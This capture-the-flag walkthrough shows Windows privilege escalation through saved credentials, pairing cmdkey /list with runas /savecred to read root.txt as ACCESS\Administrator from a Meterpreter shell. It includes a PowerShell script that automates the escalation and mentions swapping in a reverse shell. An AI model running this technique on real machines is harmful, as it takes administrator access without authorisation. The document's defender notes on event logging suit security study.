Runas

Allows a user to run specific tools and programs with different permissions than the user's current logon provides.

cmdkey /list
  • cmdkey: A native Windows command-line utility used to create, list, and delete stored usernames and passwords or credentials.

  • /list: The specific switch that instructs the utility to display all credentials currently stored on the local computer for the logged-in user.

The primary utility of this command is Credential Enumeration.

In a system administration or security context, it shows which credentials the current user has saved in Windows Credential Manager for targets such as network shares, domain controllers, or remote desktop connections. (These are saved credentials, not the cached domain logon verifiers Windows keeps for offline logon.) An entry whose target reads Domain:interactive=<user> is one that runas /savecred can consume. On the box in this example, cmdkey /list reports a stored Domain Password for the user ACCESS\Administrator.

A saved credential for ACCESS\Administrator is present, which makes the following runas invocation possible (the paths are elided here as in the original notes):

  runas /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE ... > ..."

Breaking it down:

  • runas.exe: A command-line tool that allows a user to run specific tools and programs with different permissions than the user's current logon provides.

  • /user:ACCESS\Administrator: Specifies the user account under which the command should run (in this case, the domain administrator for ACCESS).

  • /savecred: Instructs Windows to use credentials previously saved by the user for that account. This is the critical flag: runas does not prompt for a password and instead pulls the Credential Manager entry identified with cmdkey /list above. Two caveats: the switch is ignored on Home and Starter editions, and if no matching saved credential exists runas simply prompts for the password (and saves it for next time).

  • "C:\Windows\System32\cmd.exe /c ...": This is the argument string. It tells the system to open a command prompt, carry out the specific command following /c, and then terminate.

  • TYPE ... > ...: The action actually performed. Because this cmd.exe is running as ACCESS\Administrator, TYPE can read root.txt on the Administrator's desktop, and the redirection writes that text to a new file under the security user's directory, where the low-privileged user can read it afterwards. Any other command could be substituted here, for example one that starts a reverse shell as Administrator.

The utility of this command is Privilege Escalation: it runs a command as Administrator and reads data that the file ACLs restrict to that account.

In a security testing scenario, once you have identified that a target system has saved credentials for a high-privileged user (like a Domain Admin), you can use runas with the /savecred flag to run commands that your current "security" user account normally wouldn't be permitted to. Defenders should note that this is noisy: the Secondary Logon service performs an explicit-credential logon, which appears in the Security log as event 4648 (logon attempted using explicit credentials) alongside a 4624 logon for the Administrator account.

Use with Reverse Meterpreter

If you are in a Windows reverse Meterpreter session, drop to a command shell first (the shell command) and then:

  1. Identify Saved Creds: Run cmdkey /list to see whether the machine has a saved credential for an admin account (look for a Domain:interactive= target).

  2. Escalate: Run the runas /savecred command above; the child cmd.exe executes as Administrator, so the file permissions that stop the security user do not apply to it.

  3. Capture the Flag: By copying root.txt to a directory you control, you retrieve data that was restricted to the Administrator account. runas returns as soon as the child process has been started, so give it a moment before reading the copied file.
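The three steps above, automated in PowerShell as an added example (this is not code from the original notes). It parses the output of cmdkey /list, keeps only the Domain:interactive entries that runas /savecred can use, and for each one runs the TYPE-and-redirect command through runas. The source path, the destination path and the 10-second wait are assumptions; both paths are assumed to contain no spaces, because the command string handed to runas is not quoted internally.

```powershell
# Added example (not from the original page): automate the three steps above.
# Assumptions: $src and $dst are hypothetical paths without spaces, and the
# destination directory is writable by the Administrator account.

# Step 1: parse `cmdkey /list` into objects with Target / Type / User fields.
function Get-StoredCredential {
    $entries = @()
    $current = $null
    foreach ($line in (cmdkey /list)) {
        if ($line -match '^\s*Target:\s*(.+)$') {
            if ($current) { $entries += [pscustomobject]$current }
            $current = @{ Target = $Matches[1].Trim(); Type = ''; User = '' }
        }
        elseif ($current -and $line -match '^\s*Type:\s*(.+)$') { $current.Type = $Matches[1].Trim() }
        elseif ($current -and $line -match '^\s*User:\s*(.+)$') { $current.User = $Matches[1].Trim() }
    }
    if ($current) { $entries += [pscustomobject]$current }
    return $entries
}

# runas /savecred only consumes entries saved as "Domain:interactive=<user>";
# generic or web credentials that cmdkey also lists will not work with it.
$candidates = Get-StoredCredential | Where-Object { $_.Target -like 'Domain:interactive=*' }
if (-not $candidates) {
    Write-Warning 'No runas-usable saved credentials found.'
    return
}

foreach ($cred in $candidates) {
    $user = $cred.User
    $src  = 'C:\Users\Administrator\Desktop\root.txt'   # hypothetical source
    $dst  = Join-Path $env:USERPROFILE 'root.txt'        # hypothetical destination
    Remove-Item $dst -ErrorAction SilentlyContinue

    # Step 2: the child cmd.exe runs as $user, so TYPE succeeds even though the
    # current user cannot read $src. PowerShell wraps $inner in quotes for runas.
    $inner = "cmd.exe /c type $src > $dst"
    Write-Host "[*] runas /savecred as $user"
    & runas.exe "/user:$user" /savecred $inner

    # Step 3: runas returns as soon as the child starts, so poll for the file.
    $deadline = (Get-Date).AddSeconds(10)
    while (-not (Test-Path $dst) -and (Get-Date) -lt $deadline) { Start-Sleep -Milliseconds 500 }

    if (Test-Path $dst) {
        Write-Host "[+] Output written by ${user}:"
        Get-Content $dst
        break
    }
    Write-Warning "[-] Nothing written; the saved credential for $user may be stale or /savecred blocked by policy."
}
```

Run it from the shell you dropped into from Meterpreter. If nothing is written, the usual causes are a stale saved password, the Home/Starter edition ignoring /savecred, or policy blocking storage of domain credentials; in each case runas prints its error to the console.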
